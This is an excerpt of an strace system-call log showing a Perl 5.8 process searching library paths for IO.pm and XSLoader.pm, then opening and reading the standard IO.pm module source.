10351 07:32:35.215958 stat64("/usr/local/lib/perl/5.8.8/IO.pm", 0xbfb49fac) = -1 ENOENT (No such file or directory)

10351 07:32:35.215972 stat64("/usr/local/share/perl/5.8.8/IO.pmc", 0xbfb4a09c) = -1 ENOENT (No such file or directory)

10351 07:32:35.215984 stat64("/usr/local/share/perl/5.8.8/IO.pm", 0xbfb49fac) = -1 ENOENT (No such file or directory)

10351 07:32:35.215998 stat64("/usr/lib/perl5/IO.pmc", 0xbfb4a09c) = -1 ENOENT (No such file or directory)

10351 07:32:35.216010 stat64("/usr/lib/perl5/IO.pm", 0xbfb49fac) = -1 ENOENT (No such file or directory)

10351 07:32:35.216023 stat64("/usr/share/perl5/IO.pmc", 0xbfb4a09c) = -1 ENOENT (No such file or directory)

10351 07:32:35.216035 stat64("/usr/share/perl5/IO.pm", 0xbfb49fac) = -1 ENOENT (No such file or directory)

10351 07:32:35.216048 stat64("/usr/lib/perl/5.8/IO.pmc", 0xbfb4a09c) = -1 ENOENT (No such file or directory)

10351 07:32:35.216060 stat64("/usr/lib/perl/5.8/IO.pm", {st_mode=S_IFREG|0644, st_size=413, ...}) = 0

10351 07:32:35.216081 open("/usr/lib/perl/5.8/IO.pm", O_RDONLY|O_LARGEFILE) = 6

10351 07:32:35.216094 ioctl(6, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb49db8) = -1 ENOTTY (Inappropriate ioctl for device)

10351 07:32:35.216106 _llseek(6, 0, [0], SEEK_CUR) = 0

10351 07:32:35.216130 read(6, "#\n\npackage IO;\n\nuse XSLoader ();\nuse Carp;\nuse strict;\nuse warnings;\n\nour $VERSION = \"1.22\";\nXSLoader::load \'IO\', $VERSION;\n\nsub import {\n    shift;\n\n    warnings::warnif(\'deprecated\', qq{Parameterless \"use IO\" deprecated})\n        if @_ == 0 ;\n    \n    my @l = @_ ? @_ : qw(Handle Seekable File Pipe Socket Dir);\n\n    eval join(\"\", map { \"require IO::\" . (/(\\w+)/)[0] . \";\\n\" } @l)\n\tor croak $@;\n}\n\n1;\n\n__END__\n\n", 4096) = 413

10351 07:32:35.216187 stat64("/etc/perl/XSLoader.pmc", 0xbfb49bec) = -1 ENOENT (No such file or directory)

10351 07:32:35.216201 stat64("/etc/perl/XSLoader.pm", 0xbfb49afc) = -1 ENOENT (No such file or directory)

10351 07:32:35.216214 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pmc", 0xbfb49bec) = -1 ENOENT (No such file or directory)

10351 07:32:35.216227 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pm", 0xbfb49afc) = -1 ENOENT (No such file or directory)

10351 07:32:35.216241 stat64("/usr/local/share/perl/5.8.8/XSLoader.pmc", 0xbfb49bec) = -1 ENOENT (No such file or directory)

10351 07:32:35.216254 stat64("/usr/local/share/perl/5.8.8/XSLoader.pm", 0xbfb49afc) = -1 ENOENT (No such file or directory)

10351 07:32:35.216272 stat64("/usr/lib/perl5/XSLoader.pmc", 0xbfb49bec) = -1 ENOENT (No such file or directory)

10351 07:32:35.216299 stat64("/usr/lib/perl5/XSLoader.pm", 0xbfb49afc) = -1 ENOENT (No such file or directory)

10351 07:32:35.216339 stat64("/usr/share/perl5/XSLoader.pmc", 0xbfb49bec) = -1 ENOENT (No such file or directory)

10351 07:32:35.216369 stat64("/usr/share/perl5/XSLoader.pm", 0xbfb49afc) = -1 ENOENT (No such file or directory)

10351 07:32:35.216382 stat64("/usr/lib/perl/5.8/XSLoader.pmc", 0xbfb49bec) = -1 ENOENT (No such file or directory)

10351 07:32:35.216395 stat64("/usr/lib/perl/5.8/XSLoader.pm", {st_mode=S_IFREG|0644, st_size=3408, ...}) = 0

10351 07:32:35.216417 open("/usr/lib/perl/5.8/XSLoader.pm", O_RDONLY|O_LARGEFILE) = 8

10351 07:32:35.216445 ioctl(8, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb49908) = -1 ENOTTY (Inappropriate ioctl for device)

10351 07:32:35.216456 _llseek(8, 0, [0], SEEK_CUR) = 0

